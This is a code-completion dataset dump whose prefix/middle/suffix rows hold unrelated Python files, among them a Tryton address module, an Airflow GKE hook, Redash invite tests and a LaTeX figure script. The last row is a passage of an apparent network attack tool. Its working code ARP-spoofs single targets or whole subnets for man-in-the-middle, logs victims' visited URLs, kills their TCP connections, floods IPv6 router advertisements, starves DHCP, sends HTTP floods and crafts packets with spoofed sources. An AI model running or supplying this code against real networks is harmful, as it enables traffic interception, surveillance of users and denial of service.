prefix stringlengths 0 918k | middle stringlengths 0 812k | suffix stringlengths 0 962k |
|---|---|---|
# Waver module __init__.py
"""
*******************************
WAVER
*******************************
This subpackage contains various utilities for WAVER,
the SuperDARN Wave Analysis Software Package.
DEV: functions/mo | dules/classes with a * have not been developed yet
*******************************
"""
#impor | t sigio
from music import *
#from signal import *
#from sigproc import *
#from compare import *
#from xcor import *
#
#
# *************************************************************
# Define a few general-use constants
# Mean Earth radius [km]
Re = 6371.0
# Polar Earth radius [km]
RePol = 6378.1370
# Equatorial Earth radius [km]
ReEqu = 6,356.7523
|
ss = cls.__table__()
mechanism = ContactMechanism.__table__()
super(Address, cls).__register__(module_name)
# Migration from 2.8: move phone and email to contact mechanisms
for column in ['email', 'phone']:
if table.column_exist(column):
join = address.join(
party, condition=(party.id == address.party)
)
select = join.select(
address.create_date, address.create_uid,
address.write_date, address.write_uid,
As(Literal(column), 'type'),
As(Column(address, column), 'value'), address.party,
As(Literal(True), 'active'),
where=(Column(address, column) != '')
)
insert = mechanism.insert(
columns=[
mechanism.create_date,
mechanism.create_uid, mechanism.write_date,
mechanism.write_uid, mechanism.type,
mechanism.value, mechanism.party, mechanism.active,
], values=select)
cursor.execute(*insert)
table.column_rename(column, '%s_deprecated' % column)
@classmethod
def get_address_form(cls, address=None):
"""
Return an initialised Address form that can be validated and used to
create/update addresses
:param address: If an active record is provided it is used to autofill
the form.
"""
if address:
form = AddressForm(
request.form,
name=address.name,
street=address.street,
streetbis=address.streetbis,
zip=address.zip,
city=address.city,
country=address.country and address.country.id,
subdivision=address.subdivision and address.subdivision.id,
email=address.party.email,
phone=address.party.phone
)
else:
address_name = "" if request.nereid_user.is_anonymous() else \
request.nereid_user.display_name
form = AddressForm(request.form, name=address_name)
return form
@classmethod
@route("/create-address", methods=["GET", "POST"])
@login_required
def create_address(cls):
"""
Create an address for the current nereid_user
GET
~~~
Return an address creation form
POST
~~~~
Creates an address and redirects to the address view. If a next_url
is provided, redirects there.
.. version_added: 3.0.3.0
"""
form = cls.get_address_form()
if request.method == 'POST' and form.validate():
party = request.nereid_user.party
address, = cls.create([{
'name': form.name.data,
'street': form.street.data,
'streetbis': form.streetbis.data,
'zip': form.zip.data,
'city': form.city.data,
'country': form.country.data,
'subdivision': form.subdivision.data,
'party': party.id,
}])
if form.email.data:
party.add_contact_mechanism_if_not_exists(
'email', form.email.data
)
if form.phone.data:
party.add_contact_mechanism_if_not_exists(
'phone', form.phone.data
)
return redirect(url_for('party.address.view_address'))
try:
return render_template('address-add.jinja', form=form)
except TemplateNotFound:
# The address-add template was | introduced in 3.0.3.0
# so just raise a deprecation warning till 3.2.X and then
| # expect the use of address-add template
warnings.warn(
"address-add.jinja template not found. "
"Will be required in future versions",
DeprecationWarning
)
return render_template('address-edit.jinja', form=form)
@classmethod
@route("/save-new-address", methods=["GET", "POST"])
@route("/edit-address/<int:address>", methods=["GET", "POST"])
@login_required
def edit_address(cls, address=None):
"""
Edit an Address
POST will update an existing address.
GET will return a existing address edit form.
.. version_changed:: 3.0.3.0
For creating new address use the create_address handled instead of
this one. The functionality would be deprecated in 3.2.X
:param address: ID of the address
"""
if address is None:
warnings.warn(
"Address creation will be deprecated from edit_address handler."
" Use party.address.create_address instead",
DeprecationWarning
)
return cls.create_address()
form = cls.get_address_form()
if address not in (a.id for a in request.nereid_user.party.addresses):
# Check if the address is in the list of addresses of the
# current user's party
abort(403)
address = cls(address)
if request.method == 'POST' and form.validate():
party = request.nereid_user.party
cls.write([address], {
'name': form.name.data,
'street': form.street.data,
'streetbis': form.streetbis.data,
'zip': form.zip.data,
'city': form.city.data,
'country': form.country.data,
'subdivision': form.subdivision.data,
})
if form.email.data:
party.add_contact_mechanism_if_not_exists(
'email', form.email.data
)
if form.phone.data:
party.add_contact_mechanism_if_not_exists(
'phone', form.phone.data
)
return redirect(url_for('party.address.view_address'))
elif request.method == 'GET' and address:
# Its an edit of existing address, prefill data
form = cls.get_address_form(address)
return render_template('address-edit.jinja', form=form, address=address)
@classmethod
@route("/view-address", methods=["GET"])
@login_required
def view_address(cls):
"View the addresses of user"
return render_template('address.jinja')
@route("/remove-address/<int:active_id>", methods=["POST"])
@login_required
def remove_address(self):
"""
Make address inactive if user removes the address from address book.
"""
if self.party == current_user.party:
self.active = False
self.save()
flash(_('Address has been deleted successfully!'))
if request.is_xhr:
return jsonify(success=True)
return redirect(request.referrer)
abort(403)
class Party(ModelSQL, ModelView):
"Party"
__name__ = 'party.party'
nereid_users = fields.One2Many('nereid.user', 'party', 'Nereid Users')
def add_contact_mechanism_if_not_exists(self, type, value):
"""
Adds a contact mechanism to the party if it does not exist
:return: The created contact mechanism or the one which existed
"""
ContactMechanism = Pool().get('party.contact_mechanism')
mechanisms = ContactMechanism.search([
('party', '=', self.id),
('type', '=', type),
('value', '=', value),
])
if not mechanisms:
mechanisms = ContactMechanism.create([{
'party': self.id,
'type': type,
'value': value,
}])
return mechanisms[0]
class ContactMechanismForm(Form):
type = SelectField('Type', [validators.Required()])
value = TextField('Value', [validators.Required( |
import pytest
from waterbutler.providers.osfstorage.exceptions import OsfStorageQuotaExceededError
class TestExceptionSerialization:
@pytest.mark.parametrize(
'exception_class',
[(OsfStorageQuotaExceededError),] |
)
def test_tolerate_dumb_signature(self, exception_class):
"""In order for WaterButlerError-inheriting exceptions to survive pickling/unpickling, it is
necessary for them to be able to be instantiated with a single integer arg. The reasons for
this are described in the docstring for `waterbutler.core.exceptions.WaterButlerError`.
"""
try:
i_live_but_why = exception_class(616)
except Exception as exc:
pytest.fa | il(str(exc))
assert isinstance(i_live_but_why, exception_class)
|
ngine Hook.
.. spelling::
gapic
enums
"""
import time
import warnings
from typing import Dict, Optional, Sequence, Union
from google.api_core.exceptions import AlreadyExists, NotFound
from google.api_core.gapic_v1.method import DEFAULT
from google.api_core.retry import Retry
# not sure why but mypy complains on missing `container_v1` but it is clearly there and is importable
from google.cloud import container_v1, exceptions # type: ignore[attr-defined]
from google.cloud.container_v1.gapic.enums import Operation
from google.cloud.container_v1.types import Cluster
from google.protobuf.json_format import ParseDict
from airflow import version
from airflow.exceptions import AirflowException
from airflow.providers.google.common.consts import CLIENT_INFO
from airflow.providers.google.common.hooks.base_google import PROVIDE_PROJECT_ID, GoogleBaseHook
OPERATIONAL_POLL_INTERVAL = 15
class GKEHook(GoogleBaseHook):
"""
Hook for Google Kubernetes Engine APIs.
All the methods in the hook where project_id is used must be called with
keyword arguments rather than positional.
"""
def __init__(
self,
gcp_conn_id: str = "google_cloud_default",
delegate_to: Optional[str] = None,
location: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
) -> None:
super().__init__(
gcp_conn_id=gcp_conn_id,
delegate_to=delegate_to,
impersonation_chain=impersonation_chain,
)
self._client = None
self.location = location
def get_conn(self) -> container_v1.ClusterManagerClient:
"""
Returns ClusterManagerCLinet object.
:rtype: google.cloud.container_v1.ClusterManagerClient
"""
if self._client is None:
credentials = self._get_credentials()
self._client = container_v1.ClusterManagerClient(credentials=credentials, client_info=CLIENT_INFO)
return self._client
# To preserve backward compatibility
# TODO: remove one day
def get_client(self) -> container_v1.ClusterManagerClient:
warnings.warn(
"The get_client method has been deprecated. You should use the get_conn method.",
DeprecationWarning,
)
return self.get_conn()
def wait_for_operation(self, operation: Operation, project_id: Optional[str] = None) -> Operation:
"""
Given an operation, continuously fetches the status from Google Cloud until either
completion or an error occurring
:param operation: The Operation to wait for
:param project_id: Google Cloud project ID
:return: A new, updated operation fetched from Google Cloud
"""
self.log.info("Waiting for OPERATION_NAME %s", operation.name)
time.sleep(OPERATIONAL_POLL_INTERVAL)
while operation.status != Operation.Status.DONE:
if operation.status == Operation.Status.RUNNING or operation.status == Operation.Status.PENDING:
time.sleep(OPERATIONAL_POLL_INTERVAL)
else:
raise exceptions.GoogleCloudError(f"Operation has failed with status: {operation.status}")
# To update status of operation
operation = self.get_operation(operation.name, project_id=project_id or self.project_id)
return operation
def get_operation(self, operation_name: str, project_id: Optional[str] = None) -> Operation:
"""
Fetches the operation from Google Cloud
:param operation_name: Name of operation to fetch
:param project_id: Google Cloud project ID
:return: The new, updated operation from Google Cloud
"""
return self.get_conn().get_operation(
name=f'projects/{project_id or self.project_id}'
+ f'/locations/{self.location}/operations/{operation_name}'
)
@staticmethod
def _append_label(cluster_proto: Cluster, key: str, val: str) -> Cluster:
"""
Append labels to provided Cluster Protobuf
Labels must fit the regex ``[a-z]([-a-z0-9]*[a-z0-9])?`` (current
airflow version string follows semantic versioning spec: x.y.z).
:param cluster_proto: The proto to append resource_label airflow
version to
:param key: The key label
:param val:
:return: The cluster proto updated with new label
"""
val = val.replace('.', '-').replace('+', '-')
cluster_proto.resource_labels.update({key: val})
return cluster_proto
@GoogleBaseHook.fallback_to_default_project_id
def delete_cluster(
self,
name: str,
project_id: str = PROVIDE_PROJECT_ID,
retry: Retry = DEFAULT,
timeout: float = DEFAULT,
) -> Optional[str]:
"""
Deletes the cluster, including the Kubernetes endpoint and all
worker nodes. Firewalls and routes that were configured during
cluster creation are also deleted. Other Google Compute Engine
resources that might be in use by the cluster (e.g. load balancer
resources) will not be deleted if they were not present at the
initial create time.
:param name: The name of the cluster to delete
:param project_id: Google Cloud project ID
:param retry: Retry object used to determine when/if to retry requests.
If None is specified, requests will not be retried.
:param timeout: The amount of time, in seconds, to wait for the request to
complete. Note that if retry is specified, the timeout applies to each
individual attempt.
:return: The full url to the delete operation if successful, else None
"""
self.log.info("Deleting (project_id=%s, location=%s, cluster_id=%s)", project_id, self.location, name)
try:
resource = self.get_conn().delete_cluster(
name=f'projects/{project_id}/locations/{self.location}/clusters/{name}',
retry=retry,
timeout=timeout,
)
resource = self.wait_for_operation(resource)
# Returns server-defined url for the resource
return resource.self_link
except NotFound as error:
self.log.info('Assuming Success: %s', error.message)
return None
@GoogleBaseHook.fallback_to_default_project_id
def create_cluster(
self,
cluster: Union[Dict, Cluster],
project_id: str = PROVIDE_PROJECT_ID,
retry: Retry = DEFAULT,
timeout: float = DEFAULT,
) -> str:
"""
Creates a cluster, consisting of the specified number and type of Google Compute
Engine instances.
:param cluster: A Cluster protobuf or dict. If dict is provided, it must
be of the same form as the protobuf message
:class:`google.cloud.container_v1.types.Cluster`
:param project_id: Google Cloud project ID
:param retry: A retry object (``google.api_core.retry.Retry``) used to
retry requests.
If None is specified, requests will not be retried.
:param timeout: The amount of time, in seconds, to wait for the request to
complete. Note that if retry is specified, the timeout applies to each
individual attempt.
:return: The full url to the new, or existing, cluster
:raises:
ParseError: On JSON parsing problems when trying to convert dict
AirflowException: cluster is not dict type nor Cluster proto type
"""
if isinstance(cluster, dict):
cluster_proto = Cluster()
cluster = ParseDict(cluster, cluster_proto)
elif not isinstance(cluster, Cluster):
raise Airflo | wException("cluste | r is not instance of Cluster proto or python dict")
self._append_label(cluster, 'airflow-version', 'v' + version.version)
self.log.info(
"Creating (project_id=%s, location=%s, cluster_name=%s)", project_id, self.location, cluster.name
)
try:
reso |
import asyncio
import logging
import os
import signal
from collections import defaultdict
import aiohttp.web
from aiohttp_index import Index | Middleware
logger = logging.getLogger('rc-car.vechicle')
class Vechicle:
DEFAULT_CFG = {}
def _ | _init__(self, cfg=None, loop=None):
self.loop = loop or asyncio.get_event_loop()
self.cfg = cfg
if self.cfg.model.use_mock:
logger.info('Use mock-factory...')
os.environ['GPIOZERO_PIN_FACTORY'] = 'mock'
from gpiozero.pins.mock import MockPWMPin
from gpiozero import Device
Device.pin_factory.pin_class = MockPWMPin
self.commands = defaultdict(list)
self.sensors = defaultdict(list)
self.parameters = defaultdict(list)
self.components = {}
self.init_signals()
self.init_aiohttp_app()
def init_signals(self):
for sig in ('SIGINT', 'SIGTERM'):
self.loop.add_signal_handler(getattr(signal, sig), self.stop)
self.loop.add_signal_handler(signal.SIGHUP, self.reload)
signal.siginterrupt(signal.SIGTERM, False)
def init_aiohttp_app(self):
self.aiohttp_app = aiohttp.web.Application(
loop=self.loop,
middlewares=[
IndexMiddleware()
]
)
self.aiohttp_app['server'] = self
def stop(self):
logger.info('Stopping server...')
async def stop():
app = self.aiohttp_app
if 'http' in app:
srv = app['http']['srv']
handler = app['http']['handler']
srv.close()
await srv.wait_closed()
await handler.shutdown(self.cfg.server.shutdown_timeout)
await app.shutdown()
await app.cleanup()
self.loop.stop()
return self.loop.create_task(stop())
def reload(self):
logger.info('Handle SIGHUP')
def add_component(self, name, component):
component.register(self)
self.components[name] = component
def get_state(self):
sensors = {
name: value()
for name, value in self.sensors.items()
}
parameters = {
name: value()
for name, value in self.parameters.items()
}
return {
'sensors': sensors,
'parameters': parameters
}
def run_forever(self):
async def init():
handler = self.aiohttp_app.make_handler()
srv = await self.loop.create_server(
handler,
host=self.cfg.server.host,
port=self.cfg.server.port,
backlog=self.cfg.server.backlog
)
self.aiohttp_app['http'] = {
'handler': handler,
'srv': srv
}
self.loop.run_until_complete(init())
logger.info(
'Service started on %s:%s with pid %s',
self.cfg.server.host, self.cfg.server.port, os.getpid())
try:
self.loop.run_forever()
finally:
logger.info('Server was stopped')
|
#!/usr/bin/env python
"Module to aggregate all pdf figures of a directory \
into a single latex file, and compile it."
from __future__ import division, | print_function
import os
import sys
import re
from optparse import OptionParser
_VERSION = '1.0'
def latex_dir(outfile_name, directory, column=2, eps=False):
"Print latex source file"
print(directory)
with open(outfile_name, 'w') as outfile:
outfile.write(r"""\documentclass[10pt]{article}
\usepackage[T1]{fontenc}
\usepackage[utf8x]{inputenc}
\usepackage{fancyhdr}
\def\goodgap{\hspace{\subfigtopskip}\hspace{\subfigbottomskip}}
\usepackage%(include_ | pdf_package_option)s{graphicx}
\usepackage{subfigure,a4wide}
%%set dimensions of columns, gap between columns, and paragraph indent
\setlength{\textheight}{8in}
%%\setlength{\textheight}{9.3in}
\setlength{\voffset}{0.5in}
\setlength{\topmargin}{-0.55in}
%%\setlength{\topmargin}{0in}
\setlength{\headheight}{12.0pt}
%%\setlength{\headsep}{0.0in}
%%\setlength{\textwidth}{7.43in}
\setlength{\textwidth}{7.10in}
%%\setlength{\textwidth}{6in}
\setlength{\hoffset}{-0.4in}
\setlength{\columnsep}{0.25in}
\setlength{\oddsidemargin}{0.0in}
\setlength{\evensidemargin}{0.0in}
%% more than .95 of text and figures
\def\topfraction{.95}
\def\floatpagefraction{.95}
\def\textfraction{.05}
\newcommand{\mydefaultheadersandfooters}
{
\chead{\today}
\rhead{\thepage}
\lfoot{}
\cfoot{}
\rfoot{}
}
\title{Automatically generated latex for directory %(title)s}
\author{%(login)s}
\begin{document}
\pagestyle{fancy}
\mydefaultheadersandfooters
\maketitle
\clearpage
""" % {'title': directory.replace('_', '\_'),
'login': os.getenv('LOGNAME').capitalize(),
'include_pdf_package_option': '' if eps else '[pdftex]'})
files = os.listdir(os.getcwd() + '/' + directory)
# exclude_filename = outfile.name.split('/')[-1].replace('.tex', '.pdf')
exclude_filename = 'latex_dir_'
pattern = re.compile(r'(?!%s)\S+\.%s' % (exclude_filename,
('eps' if eps else 'pdf')))
count = 0
if column == 1:
line_size = .99
elif column == 2:
line_size = .49
else:
print("invalid column size")
raise
nb_floats = 0
for cur_file in sorted(files):
if pattern.match(cur_file):
nb_floats += 1
if column == 1 or count % 2 == 0:
outfile.write(r"\begin{figure}[!ht]"
r"\begin{center}")
outfile.write(r"\subfigure[]{\includegraphics" +
r"[width=%f\textwidth,height=%f\textheight]{%s/%s}}"
% (line_size, .7*line_size, directory, cur_file))
if column == 1 or count % 2 != 0:
outfile.write('\n' + r"\caption{}\end{center}\end{figure}"
+ '\n')
if nb_floats >= 4:
outfile.write(r"\clearpage")
nb_floats = 0
elif count % 2 == 0:
# outfile.write('\goodgap')
pass
else:
print("Double column and modulo is not working on count: %d"
% count)
raise
count += 1
if count % 2 == 1:
outfile.write('\n' + r"\caption{}\end{center}\end{figure}" + '\n')
outfile.write(r"\end{document}")
def main():
"Option parsing and launch latex_dir"
usage = "%prog [-c nb_of_columns -w outtexfile] directory_list"
parser = OptionParser(usage = usage)
parser.add_option('-w', dest='outtexfile', type='string',
help='output latex file (default is dir/latex_dir.tex)')
parser.add_option('-c', dest='column', type='int', default = 2,
help='number of columns of latex file: 1 or 2')
parser.add_option('--eps', dest='eps', default=False, action='store_true',
help='use eps files instead of pdf')
(options, args) = parser.parse_args()
if not args:
parser.print_help()
exit(5)
for directory in args:
if not options.outtexfile:
outfile_name = os.sep.join((directory,
'latex_dir_%s.tex' % directory))
else:
outfile_name = options.outtexfile
if options.column not in (1, 2):
print("invalid number of columns")
parser.print_help()
exit(5)
latex_dir(outfile_name, directory, options.column, eps=options.eps)
#compile the tex file
if options.eps:
os.execlp('latex', 'latex', '-interaction=nonstopmode',
'-output-directory', directory, outfile_name)
else:
os.execlp('pdflatex', 'pdflatex', '-interaction=nonstopmode',
'-output-directory', directory, outfile_name)
if __name__ == '__main__':
sys.exit(main())
|
from tests import BaseTestCase
import mock
import time
from redash.models import User
from redash.authentication.account import invite_token
from tests.handlers import get_request, post_request
class TestInvite(BaseTestCase):
def test_expired_invite_token(self):
with mock.patch('time.time') as patched_time:
patched_time.return_value = time.time() - (7 * 24 * 3600) - 10
token = invite_token(self.factory.user)
response = get_request('/invite/{}'.format(token), org=self.factory.org)
self.assertEqual(response.status_code, 400)
def test_invalid_invite_token(self):
response = get_request('/invite/badtoken', org=self.factory.org)
self.assertEqual(response.status_code, 400)
def test_valid_token(self):
token = invite_token(self.factory.user)
response = get_request('/invite/{}'.format(token), org=self.factory.org)
self.assertEqual(response.status_code, 2 | 00)
d | ef test_already_active_user(self):
pass
class TestInvitePost(BaseTestCase):
def test_empty_password(self):
token = invite_token(self.factory.user)
response = post_request('/invite/{}'.format(token), data={'password': ''}, org=self.factory.org)
self.assertEqual(response.status_code, 400)
def test_invalid_password(self):
token = invite_token(self.factory.user)
response = post_request('/invite/{}'.format(token), data={'password': '1234'}, org=self.factory.org)
self.assertEqual(response.status_code, 400)
def test_bad_token(self):
response = post_request('/invite/{}'.format('jdsnfkjdsnfkj'), data={'password': '1234'}, org=self.factory.org)
self.assertEqual(response.status_code, 400)
def test_already_active_user(self):
pass
def test_valid_password(self):
token = invite_token(self.factory.user)
password = 'test1234'
response = post_request('/invite/{}'.format(token), data={'password': password}, org=self.factory.org)
self.assertEqual(response.status_code, 302)
self.factory.user = User.get_by_id(self.factory.user.id)
self.assertTrue(self.factory.user.verify_password(password))
|
start_and_wait(
service_resolver, context, [servicetostart], True, False, False, None, port, secondsToWait, append_args,
)
self.assertIsNotNone(context.get_service(servicetostart).status())
context.kill(servicetostart, True)
self.assertEqual(context.get_service(servicetostart).status(), [])
def test_play_from_default_run_from_source(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
servicetostart = "PLAY_NEXUS_END_TO_END_DEFAULT_SOURCE_TEST"
port = None
secondsToWait = 90
append_args = None
actions.start_and_wait(
service_resolver, context, [servicetostart], False, False, False, None, port, secondsToWait, append_args,
)
self.assertIsNotNone(context.get_service(servicetostart).status())
context.kill(servicetostart, True)
self.assertEqual(context.get_service(servicetostart).status(), [])
def test_play_from_source_default(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
servicetostart = "PLAY_NEXUS_END_TO_END_TEST"
port = None
secondsToWait = 90
append_args = None
actions.start_and_wait(
service_resolver, context, [servicetostart], False, False, False, None, port, secondsToWait, append_args,
)
self.assertIsNotNone(context.get_service(servicetostart).status())
context.kill(servicetostart, True)
self.assertEqual(context.get_service(servicetostart).status(), [])
def test_successful_play_from_jar_without_waiting(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
context.kill_everything(True)
self.startFakeNexus()
fatJar = True
release = False
proxy = None
port = None
seconds_to_wait = None
append_args = None
try:
servicetostart = ["PLAY_NEXUS_END_TO_END_TEST"]
actions.start_and_wait(
service_resolver,
context,
servicetostart,
False,
fatJar,
release,
proxy,
port,
seconds_to_wait,
append_args,
)
finally:
context.kill_everything(True)
def test_successful_play_default_run_from_jar_without_waiting(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
context.kill_everything(True)
self.startFakeNexus()
source = False
fatJar = True
release = False
proxy = None
port = None
seconds_to_wait = None
append_args = None
try:
servi | cetostart = ["PLAY_NEXUS_END_TO_END_DEFAULT_JAR_TEST"]
actions.start_and_wait(
ser | vice_resolver,
context,
servicetostart,
source,
fatJar,
release,
proxy,
port,
seconds_to_wait,
append_args,
)
finally:
context.kill_everything(True)
def test_successful_play_from_jar_without_waiting_with_append_args(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
context.kill_everything(True)
self.startFakeNexus()
servicetostart = ["PLAY_NEXUS_END_TO_END_TEST"]
appendArgs = {"PLAY_NEXUS_END_TO_END_TEST": ["-DFoo=Bar"]}
fatJar = True
release = False
proxy = None
port = None
seconds_to_wait = None
actions.start_and_wait(
service_resolver, context, servicetostart, False, fatJar, release, proxy, port, seconds_to_wait, appendArgs,
)
service = SmPlayService(context, "PLAY_NEXUS_END_TO_END_TEST")
self.waitForCondition(lambda: len(SmProcess.processes_matching(service.pattern)), 1)
processes = SmProcess.processes_matching(service.pattern)
self.assertTrue("-DFoo=Bar" in processes[0].args)
def test_failing_play_from_jar(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
context.kill_everything(True)
self.startFakeNexus()
try:
servicetostart = ["BROKEN_PLAY_PROJECT"]
actions.start_and_wait(
service_resolver,
context,
servicetostart,
source=False,
fatjar=True,
release=False,
proxy=None,
port=None,
seconds_to_wait=2,
append_args=None,
)
self.fail("Did not expect the project to startup.")
except ServiceManagerException as sme:
self.assertEqual("Timed out starting service(s): BROKEN_PLAY_PROJECT", sme.args[0])
finally:
context.kill_everything(True)
def test_start_and_stop_one_duplicate(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
actions.start_and_wait(
service_resolver,
context,
["TEST_ONE"],
False,
False,
False,
None,
port=None,
seconds_to_wait=90,
append_args=None,
)
self.assertIsNotNone(context.get_service("TEST_ONE").status())
result = actions.start_one(context, "TEST_ONE", False, True, False, None, port=None)
self.assertFalse(result)
context.kill("TEST_ONE", True)
self.assertEqual(context.get_service("TEST_ONE").status(), [])
def test_assets_server(self):
context = SmContext(SmApplication(self.config_dir_override), None, False, False)
context.kill_everything(True)
self.startFakeArtifactory()
actions.start_one(
context, "PYTHON_SIMPLE_SERVER_ASSETS_FRONTEND", False, True, False, None, port=None,
)
self.assertIsNotNone(context.get_service("PYTHON_SIMPLE_SERVER_ASSETS_FRONTEND").status())
context.kill("PYTHON_SIMPLE_SERVER_ASSETS_FRONTEND", wait=True)
self.assertEqual(context.get_service("PYTHON_SIMPLE_SERVER_ASSETS_FRONTEND").status(), [])
def test_wait_on_assets_server(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
context.kill_everything(True)
self.startFakeArtifactory()
port = None
seconds_to_wait = 5
append_args = None
actions.start_and_wait(
service_resolver,
context,
["PYTHON_SIMPLE_SERVER_ASSETS_FRONTEND"],
False,
True,
False,
None,
port,
seconds_to_wait,
append_args,
)
self.assertIsNotNone(context.get_service("PYTHON_SIMPLE_SERVER_ASSETS_FRONTEND").status())
context.kill("PYTHON_SIMPLE_SERVER_ASSETS_FRONTEND", True)
self.assertEqual(context.get_service("PYTHON_SIMPLE_SERVER_ASSETS_FRONTEND").status(), [])
def test_python_server_offline(self):
context = SmContext(SmApplication(self.config_dir_overrid |
='store', dest='brute', default="none",
help='Bruteforce SSH of given ip... example : -brute file-192.168.1.254:22')
parser.add_argument('-mitm', action='store', dest='mitm', default="none",
help='Perform MITM Attack on target')
parser.add_argument('-mitmAll', action='store', dest='mitmall', default="none",
help='Perform MITM Attack on all hosts')
parser.add_argument('-stop-mitm', action='store_true', dest='stopmitm', default=False,
help='Stop any Running MITM Attack')
parser.add_argument('-denyTcp', action='store', dest='denytcp', default="none",
help='Deny tcp connections of given host')
parser.add_argument('--dg', action='store', dest='dg', default="none",
help='Perform MITM Attack with given Default Gateway')
parser.add_argument('-craft', action='store', dest='packetcraft', default=False,
help='Enable Packet Crafting.. Example: -craft IP-TCP-DST192.168.1.1-SRC192.168.1.10-DPORT80')
parser.add_argument('-stress', action='store', dest='stress', default="none",
help='Perform Stress Testing on LAN.. Modes: DHCPv4-50,DHCPv6')
results = parser.parse_args()
### Functions
def httpflood(target):
ip=target
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 80))
s.send("""GET /?="""+str(random.randrange(9999999))+""" HTTP/1.1\r\n
Connection: Keep-Alive """)
print """GET /"""+str(random.randrange(9999999))+""" HTTP/1.1\r\n
Connection: Keep-Alive """
except ValueError:
print "Host seems down or some connection error trying again..."
##################
if not(results.output):
output=str(time.time())
else:
output=results.output
syn=""
scantype="-sn" #basic ping scan
if not(results.timeout=="none"):
timeout="timeout "+results.timeout+"s "
print "\n\nTimeout set for seconds:"+results.timeout
else:
timeout=""
if(results.scan):
ipaddr=str(results.scan)
if(results.arpscan): ##BETA TEST
res,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ipaddr))
output=str(res.summary( lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%")))
file=open("arpscan.txt","a")
print output
file.write(output)
file.close()
else:
print ipaddr
if(results.syn):
scantype="-sS -O" #syn and
if(results.service):
scantype=scantype+" -sV"
scancmd=timeout+"sudo nmap "+scantype+" -oX "+output+" "+ipaddr #writes xml output so we can convert it into html
print scancmd
print os.popen(scancmd).read() #ping scan to know online hosts
if(results.ipv6ra):
minutes=results.ipv6ra
print "running for minutes: "+minutes
#run ipv6 RA flooding for N minutes
i=0
while (i <= minutes):
print "Firing RAs everywhere"
a = IPv6()
a.dst = "ff02::1" #IPv6 Destination "Everyone" Multicast (broadcast)
a.display()
b = ICMPv6ND_RA()
b.display()
c = ICMPv6NDOptSrcLLAddr()
c.lladdr = "00:50:56:24:3b:c0" #MAC
c.display()
d = ICMPv6NDOptMTU()
d.display()
e = ICMPv6NDOptPrefixInfo()
e.prefixlen = 64
randomhex=hex(random.randint(0, 16777215))[2:].upper()
prefix=randomhex[:4]
e.prefix = prefix+"::" #Global Prefix
e.display()
send(a/b/c/d/e) # Send the packet
print "Sending IPv6 RA Packet :)"
time.sleep(1)
i=i+1
print i
if not(results.denytcp=="none"): #Works if you are the gateway or during MITM
target=results.denytcp
os.popen("nohup "+timeout+"tcpkill host "+target+" >/dev/null 2>&1 &")
#deny tcp traffic
if not(results.mitmall=="none"): #Most efficent way to arpspoof subnet
ipnet=results.mitmall
iplist=os.popen("nmap -sP "+ipnet+" | grep 'Nmap scan' | awk '{ print $5; }'").read()
iplist=iplist.split()
dgip=os.popen("ip route show | grep 'default' | awk '{print $3}' ").read()
dgip=dgip.split()[0]
print "Spoofing "+dgip+"\n\n"
print "Targets: \n"
for ip in iplist:
print ip
os.popen("nohup "+timeout+"arpspoof -t "+ip+" "+dgip+" >/dev/null 2>&1 &")
os.popen("nohup "+timeout+"urlsnarf >> visitedsites >/dev/null 2>&1 &")
EnaLogging() # Enable iptables-logging
if not(results.mitm=="none"):
print "im in"
target=results.mitm
if(results.dg=="none"): #Searches for gateway
dg=os.popen("ip route show | grep 'default' | awk '{print $3}' ").read()
dg=dg.split()[0]
print dg
else:
dg=results.dg
#Automatically searches for gateway and arpspoof all hosts
os.popen("nohup "+timeout+"arpspoof -t "+target+" "+dg+" >/dev/null 2>&1 &")
os.popen("nohup "+timeout+"urlsnarf >> visitedsites &")
print "Started ARP Spoof and URL Logging"
#Start ARP Spoofing with given arguments or calculated ones
EnaLogging() # Enable iptables-logging
print "Added temp firewall rules to log MITM traffic"
if(results.packetcraft): #Packet Crafting with scapy
########### PACKET CRAFTING EXAMPLE TCP-DST192.168.1.1-SRC192.168.1.10
########### ./boafiPenTest.py -craft TCP-DST192.168.1.1-SRC192.168.1.10-DPORT80-5
craft=(results.packetcraft).split("-")
if("TCP" in craft[0] | ):
a=IP()/TCP()
elif("UDP" in craft[0]):
a=IP()/UDP()
if("DST" in craft[1]):
ipdst=craft[1].repla | ce("DST","")
a.dst=ipdst
if("SRC" in craft[2]):
ipsrc=craft[2].replace("SRC","")
a.src=ipsrc
if("DPORT" in craft[3]):
dport=craft[3].replace("DPORT","")
a.dport=dport
n=craft[4] ##N° of packets
i=0
while(i<=n):
i=i+1
a.display()
send(a)
print "Sent packet"
if not(results.stress=="none"):
try: #if it can
rawstring=results.stress.split("-")
mode=rawstring[0]
except:
print "Can't parse your command"
print "\nusing default DHCPv4 stress attack"
mode="DHCPv4"
count=20
if("DHCPv4" in mode): # DHCPv4-50
count=int(rawstring[1])
iface = "eth0"
unique_hexdigits = str.encode("".join(set(string.hexdigits.lower())))
print unique_hexdigits
packet = (Ether(dst="ff:ff:ff:ff:ff:ff")/
IP(src="0.0.0.0", dst="255.255.255.255")/
UDP(sport=68, dport=67)/
BOOTP(chaddr=RandString(12, unique_hexdigits))/
DHCP(options=[("message-type", "discover"), "end"]))
print "Sending dhcp requests"
sendp(packet,iface=iface,count=count)
if("HTTP" in mode): #HTTP-192.168.1.1-500
ip=rawstring[1]
count=int(rawstring[2])
i=0
while(i<=count):
i=i+1
httpflood(ip)
print "Finished flooding!"
